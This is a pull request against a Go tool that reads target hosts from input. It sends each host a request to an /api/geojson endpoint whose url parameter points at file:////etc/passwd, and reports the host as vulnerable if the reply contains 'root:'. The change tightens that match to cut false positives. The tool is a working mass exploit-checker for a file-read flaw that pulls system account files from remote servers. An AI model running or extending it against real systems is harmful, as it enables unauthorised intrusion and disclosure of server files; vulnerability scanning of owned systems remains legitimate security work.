### PR TITLE
search for "root:" to reduce false positives

### DIFF
--- a/main.go
+++ b/main.go
@@ -13,7 +13,7 @@ import (
 	"time"
 )
 
-func IsVulnerable(target string, wg *sync.WaitGroup) {
+func isVulnerable(target string, wg *sync.WaitGroup) {
 	url := "https://" + target + "/api/geojson?url=file:////etc/passwd"
 	client := http.Client{
 		Timeout: 15 * time.Second,
@@ -28,8 +28,10 @@ func IsVulnerable(target string, wg *sync.WaitGroup) {
 				log.Fatal(err)
 			}
 			bodyString := string(bodyBytes)
-			if strings.Contains(bodyString, "root") {
+			if strings.Contains(bodyString, "root:") {
 				fmt.Println("\033[1;32m[+] " + target + " is vulnerable [" + url + "]\033[0m")
+			} else {
+				fmt.Println("\033[0;31m[-] " + target + "\033[0m")
 			}
 		} else {
 			fmt.Println("\033[0;31m[-] " + target + "\033[0m")
@@ -47,7 +49,7 @@ func main() {
 	for scanner.Scan() {
 		target := scanner.Text()
 		wg.Add(1)
-		go IsVulnerable(target, &wg)
+		go isVulnerable(target, &wg)
 	}
 	wg.Wait()
 }


### PR DESCRIPTION
This simple change eliminates **false positives** that occur when the original request gets redirected to a page containing the string "root".